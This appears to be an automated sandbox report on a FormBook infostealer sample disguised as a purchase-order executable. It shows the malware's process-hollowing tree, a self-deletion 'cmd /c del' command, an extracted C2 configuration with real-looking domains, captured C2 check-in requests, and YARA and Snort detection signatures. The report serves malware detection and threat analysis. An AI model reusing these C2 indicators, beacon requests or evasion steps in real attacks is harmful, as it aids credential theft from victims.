Loading ...

Play interactive tourEdit tour

Windows Analysis Report PO_101&102.exe

Overview

General Information

Sample Name:PO_101&102.exe
Analysis ID:510596
MD5:d814902ba2d06c94c66f52ce53ed1428
SHA1:152f01b88a43ae7f0cf486a947bb0b0b23496827
SHA256:cce115dcfb19503dfbc71566681425094ca56887fc1afe85b9bc9788341312bf
Tags:exeformbook
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Initial sample is a PE file and has a suspicious name
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Machine Learning detection for sample
Modifies the prolog of user mode functions (user mode inline hooks)
Self deletion via cmd delete
Injects a PE file into a foreign processes
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
Contains functionality to read the PEB
Checks if the current process is being debugged
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to detect virtual machines (SGDT)

Classification

Process Tree

  • System is w10x64
  • PO_101&102.exe (PID: 7068 cmdline: 'C:\Users\user\Desktop\PO_101&102.exe' MD5: D814902BA2D06C94C66F52CE53ED1428)
    • PO_101&102.exe (PID: 6060 cmdline: {path} MD5: D814902BA2D06C94C66F52CE53ED1428)
      • explorer.exe (PID: 3352 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • wlanext.exe (PID: 6924 cmdline: C:\Windows\SysWOW64\wlanext.exe MD5: CD1ED9A48316D58513D8ECB2D55B5C04)
          • cmd.exe (PID: 1496 cmdline: /c del 'C:\Users\user\Desktop\PO_101&102.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 4008 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.reynbetgirisi.com/snr6/"], "decoy": ["jjglassmi1.com", "vpsseattle.com", "drfllc.top", "staycoolonline.com", "eptlove.com", "solusimatasehat.site", "ionrarecharlestonproperties.com", "b3eflucg.xyz", "tvchosun-usa.com", "mmahzxwzsadqlshop.life", "gospelimport.com", "demoapps.website", "jackburst54.com", "99rocket.education", "ccbwithbri.com", "trapperairsoft.com", "useroadly.com", "ralphlaurenonline-nl.com", "loanmaster4u.com", "champ-beauty-tomigaoka-nail.com", "theripemillennial.com", "123intan.net", "typopendant.com", "coruscant.holdings", "bio-intelligenz-therapie.com", "reprv.com", "directreport.net", "phinespe.xyz", "xuvedae.site", "idilikproperties.info", "wakigaggenin.com", "mal2tech.com", "nftwhaler.xyz", "gxhnjssx.com", "ozba.xyz", "lecupcake.net", "lucid.quest", "kaleoslawncare.com", "tiew.store", "texcommercialpainting.com", "2152351.com", "likewize-xl.com", "dacooligans.com", "manuelmartinezs.com", "beancusp.com", "barbershopvalleyvillage.com", "southwickfunerals.com", "briellebaeslay.info", "rebeccarye.com", "unitedstateswelders.com", "saudiarabiavegan.com", "testcarona.com", "serverapsd.com", "crickx.email", "hdszbj.com", "bennettmountainoutfitter.com", "leileilei1999.xyz", "baroquefolke.com", "francinegeorges.com", "horpces.online", "resolutionfix.com", "mike-schultz.xyz", "sohutobankueahomupezinkv.xyz", "flowerseedqueen.com"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000009.00000002.348466397.0000000000FB0000.00000040.00020000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000009.00000002.348466397.0000000000FB0000.00000040.00020000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000009.00000002.348466397.0000000000FB0000.00000040.00020000.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x18849:$sqlite3step: 68 34 1C 7B E1
    • 0x1895c:$sqlite3step: 68 34 1C 7B E1
    • 0x18878:$sqlite3text: 68 38 2A 90 C5
    • 0x1899d:$sqlite3text: 68 38 2A 90 C5
    • 0x1888b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x189b3:$sqlite3blob: 68 53 D8 7F 8C
    0000000A.00000000.333516525.000000000F6F6000.00000040.00020000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      0000000A.00000000.333516525.000000000F6F6000.00000040.00020000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x26b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x21a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x27b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x292f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x141c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0x8927:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x992a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 29 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      9.0.PO_101&102.exe.400000.6.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        9.0.PO_101&102.exe.400000.6.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        9.0.PO_101&102.exe.400000.6.raw.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x18849:$sqlite3step: 68 34 1C 7B E1
        • 0x1895c:$sqlite3step: 68 34 1C 7B E1
        • 0x18878:$sqlite3text: 68 38 2A 90 C5
        • 0x1899d:$sqlite3text: 68 38 2A 90 C5
        • 0x1888b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x189b3:$sqlite3blob: 68 53 D8 7F 8C
        9.0.PO_101&102.exe.400000.8.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          9.0.PO_101&102.exe.400000.8.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x8b08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x8d82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x148b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x143a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x149b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x14b2f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x979a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1361c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xa493:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1ab27:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1bb2a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 19 entries

          Sigma Overview

          No Sigma rule has matched

          Jbx Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Found malware configurationShow sources
          Source: 00000009.00000002.348466397.0000000000FB0000.00000040.00020000.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.reynbetgirisi.com/snr6/"], "decoy": ["jjglassmi1.com", "vpsseattle.com", "drfllc.top", "staycoolonline.com", "eptlove.com", "solusimatasehat.site", "ionrarecharlestonproperties.com", "b3eflucg.xyz", "tvchosun-usa.com", "mmahzxwzsadqlshop.life", "gospelimport.com", "demoapps.website", "jackburst54.com", "99rocket.education", "ccbwithbri.com", "trapperairsoft.com", "useroadly.com", "ralphlaurenonline-nl.com", "loanmaster4u.com", "champ-beauty-tomigaoka-nail.com", "theripemillennial.com", "123intan.net", "typopendant.com", "coruscant.holdings", "bio-intelligenz-therapie.com", "reprv.com", "directreport.net", "phinespe.xyz", "xuvedae.site", "idilikproperties.info", "wakigaggenin.com", "mal2tech.com", "nftwhaler.xyz", "gxhnjssx.com", "ozba.xyz", "lecupcake.net", "lucid.quest", "kaleoslawncare.com", "tiew.store", "texcommercialpainting.com", "2152351.com", "likewize-xl.com", "dacooligans.com", "manuelmartinezs.com", "beancusp.com", "barbershopvalleyvillage.com", "southwickfunerals.com", "briellebaeslay.info", "rebeccarye.com", "unitedstateswelders.com", "saudiarabiavegan.com", "testcarona.com", "serverapsd.com", "crickx.email", "hdszbj.com", "bennettmountainoutfitter.com", "leileilei1999.xyz", "baroquefolke.com", "francinegeorges.com", "horpces.online", "resolutionfix.com", "mike-schultz.xyz", "sohutobankueahomupezinkv.xyz", "flowerseedqueen.com"]}
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 9.0.PO_101&102.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.0.PO_101&102.exe.400000.8.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.2.PO_101&102.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.0.PO_101&102.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.2.PO_101&102.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.0.PO_101&102.exe.400000.8.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.PO_101&102.exe.3a4c4e0.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.0.PO_101&102.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000009.00000002.348466397.0000000000FB0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000000.333516525.000000000F6F6000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.348384221.0000000000D70000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000000.320955277.000000000F6F6000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.542137974.0000000003070000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.539322069.00000000008D0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000000.291465505.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.542399139.00000000030A0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.294755714.00000000039A0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.348134923.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000000.291860367.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Antivirus detection for URL or domainShow sources
          Source: www.reynbetgirisi.com/snr6/Avira URL Cloud: Label: malware
          Machine Learning detection for sampleShow sources
          Source: PO_101&102.exeJoe Sandbox ML: detected
          Source: 9.0.PO_101&102.exe.400000.8.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 9.0.PO_101&102.exe.400000.4.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 9.2.PO_101&102.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 9.0.PO_101&102.exe.400000.6.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: PO_101&102.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: PO_101&102.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: wntdll.pdbUGP source: PO_101&102.exe, 00000009.00000002.348548606.0000000001050000.00000040.00000001.sdmp, wlanext.exe, 0000000D.00000002.543166274.00000000032DF000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: PO_101&102.exe, wlanext.exe
          Source: Binary string: wlanext.pdb source: PO_101&102.exe, 00000009.00000002.348426415.0000000000DB9000.00000004.00000020.sdmp
          Source: Binary string: wlanext.pdbGCTL source: PO_101&102.exe, 00000009.00000002.348426415.0000000000DB9000.00000004.00000020.sdmp
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 4x nop then mov dword ptr [ebp-18h], 00000000h
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 4x nop then mov dword ptr [ebp-18h], 00000000h
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 4x nop then pop ebx
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 4x nop then pop esi
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4x nop then pop ebx
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4x nop then pop esi

          Networking:

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49754 -> 52.44.94.227:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49754 -> 52.44.94.227:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49754 -> 52.44.94.227:80
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeDomain query: www.barbershopvalleyvillage.com
          Source: C:\Windows\explorer.exeDomain query: www.champ-beauty-tomigaoka-nail.com
          Source: C:\Windows\explorer.exeNetwork Connect: 150.95.255.38 80
          Source: C:\Windows\explorer.exeDomain query: www.reprv.com
          Source: C:\Windows\explorer.exeNetwork Connect: 52.44.94.227 80
          C2 URLs / IPs found in malware configurationShow sources
          Source: Malware configuration extractorURLs: www.reynbetgirisi.com/snr6/
          Source: Joe Sandbox ViewASN Name: AMAZON-AESUS AMAZON-AESUS
          Source: Joe Sandbox ViewASN Name: INTERQGMOInternetIncJP INTERQGMOInternetIncJP
          Source: global trafficHTTP traffic detected: GET /snr6/?v0DD=Zy5Qpi9o71BxgS1SycsJXGxeSETLIPANxi7ogI8FlHlRlRfybFGNqMyxmIVsIwo4eCM0&p2MTV=Jf94jZD8vHv8m HTTP/1.1Host: www.barbershopvalleyvillage.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /snr6/?v0DD=AT56xQorg2W9iGq4d7Tt4iWj+Y9aO9Wbdx0aYCn8sjL6tNqdMMFemPCECz3N3nQc4IZ0&p2MTV=Jf94jZD8vHv8m HTTP/1.1Host: www.champ-beauty-tomigaoka-nail.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 150.95.255.38 150.95.255.38
          Source: wlanext.exe, 0000000D.00000002.543670677.0000000003C7F000.00000004.00020000.sdmpString found in binary or memory: http://dfltweb1.onamae.com
          Source: PO_101&102.exe, 00000001.00000003.273913731.00000000010AD000.00000004.00000001.sdmpString found in binary or memory: http://en.w
          Source: PO_101&102.exe, 00000001.00000002.296658993.0000000006A72000.00000004.00000001.sdmpString found in binary or memory: http://fontfabrik.com
          Source: PO_101&102.exe, 00000001.00000002.293898506.0000000002861000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameP
          Source: PO_101&102.exeString found in binary or memory: http://tempuri.org/DatabaseDataSet.xsd
          Source: PO_101&102.exe, 00000001.00000002.296658993.0000000006A72000.00000004.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: PO_101&102.exe, 00000001.00000002.296658993.0000000006A72000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: PO_101&102.exe, 00000001.00000002.296658993.0000000006A72000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: PO_101&102.exe, 00000001.00000002.296658993.0000000006A72000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: PO_101&102.exe, 00000001.00000002.296658993.0000000006A72000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: PO_101&102.exe, 00000001.00000002.296658993.0000000006A72000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: PO_101&102.exe, 00000001.00000002.296658993.0000000006A72000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
          Source: PO_101&102.exe, 00000001.00000002.296658993.0000000006A72000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: PO_101&102.exe, 00000001.00000002.296658993.0000000006A72000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: PO_101&102.exe, 00000001.00000002.296658993.0000000006A72000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: PO_101&102.exe, 00000001.00000002.296658993.0000000006A72000.00000004.00000001.sdmpString found in binary or memory: http://www.fonts.com
          Source: PO_101&102.exe, 00000001.00000002.296658993.0000000006A72000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: PO_101&102.exe, 00000001.00000002.296658993.0000000006A72000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: PO_101&102.exe, 00000001.00000002.296658993.0000000006A72000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: PO_101&102.exe, 00000001.00000002.296658993.0000000006A72000.00000004.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: PO_101&102.exe, 00000001.00000002.296658993.0000000006A72000.00000004.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: PO_101&102.exe, 00000001.00000002.296658993.0000000006A72000.00000004.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: PO_101&102.exe, 00000001.00000002.296658993.0000000006A72000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: PO_101&102.exe, 00000001.00000002.296658993.0000000006A72000.00000004.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: PO_101&102.exe, 00000001.00000002.296658993.0000000006A72000.00000004.00000001.sdmpString found in binary or memory: http://www.sakkal.com
          Source: PO_101&102.exe, 00000001.00000002.296658993.0000000006A72000.00000004.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: PO_101&102.exe, 00000001.00000002.296658993.0000000006A72000.00000004.00000001.sdmpString found in binary or memory: http://www.tiro.com
          Source: PO_101&102.exe, 00000001.00000002.296658993.0000000006A72000.00000004.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: PO_101&102.exe, 00000001.00000002.296658993.0000000006A72000.00000004.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: PO_101&102.exe, 00000001.00000002.296658993.0000000006A72000.00000004.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: unknownDNS traffic detected: queries for: www.barbershopvalleyvillage.com
          Source: global trafficHTTP traffic detected: GET /snr6/?v0DD=Zy5Qpi9o71BxgS1SycsJXGxeSETLIPANxi7ogI8FlHlRlRfybFGNqMyxmIVsIwo4eCM0&p2MTV=Jf94jZD8vHv8m HTTP/1.1Host: www.barbershopvalleyvillage.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /snr6/?v0DD=AT56xQorg2W9iGq4d7Tt4iWj+Y9aO9Wbdx0aYCn8sjL6tNqdMMFemPCECz3N3nQc4IZ0&p2MTV=Jf94jZD8vHv8m HTTP/1.1Host: www.champ-beauty-tomigaoka-nail.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 9.0.PO_101&102.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.0.PO_101&102.exe.400000.8.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.2.PO_101&102.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.0.PO_101&102.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.2.PO_101&102.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.0.PO_101&102.exe.400000.8.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.PO_101&102.exe.3a4c4e0.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.0.PO_101&102.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000009.00000002.348466397.0000000000FB0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000000.333516525.000000000F6F6000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.348384221.0000000000D70000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000000.320955277.000000000F6F6000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.542137974.0000000003070000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.539322069.00000000008D0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000000.291465505.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.542399139.00000000030A0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.294755714.00000000039A0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.348134923.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000000.291860367.0000000000400000.00000040.00000001.sdmp, type: MEMORY

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 9.0.PO_101&102.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 9.0.PO_101&102.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 9.0.PO_101&102.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 9.0.PO_101&102.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 9.2.PO_101&102.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 9.2.PO_101&102.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 9.0.PO_101&102.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 9.0.PO_101&102.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 9.2.PO_101&102.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 9.2.PO_101&102.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 9.0.PO_101&102.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 9.0.PO_101&102.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.PO_101&102.exe.3a4c4e0.2.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.PO_101&102.exe.3a4c4e0.2.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 9.0.PO_101&102.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 9.0.PO_101&102.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000009.00000002.348466397.0000000000FB0000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000002.348466397.0000000000FB0000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000A.00000000.333516525.000000000F6F6000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000A.00000000.333516525.000000000F6F6000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000009.00000002.348384221.0000000000D70000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000002.348384221.0000000000D70000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000A.00000000.320955277.000000000F6F6000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000A.00000000.320955277.000000000F6F6000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000D.00000002.542137974.0000000003070000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000D.00000002.542137974.0000000003070000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000D.00000002.539322069.00000000008D0000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000D.00000002.539322069.00000000008D0000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000009.00000000.291465505.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000000.291465505.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
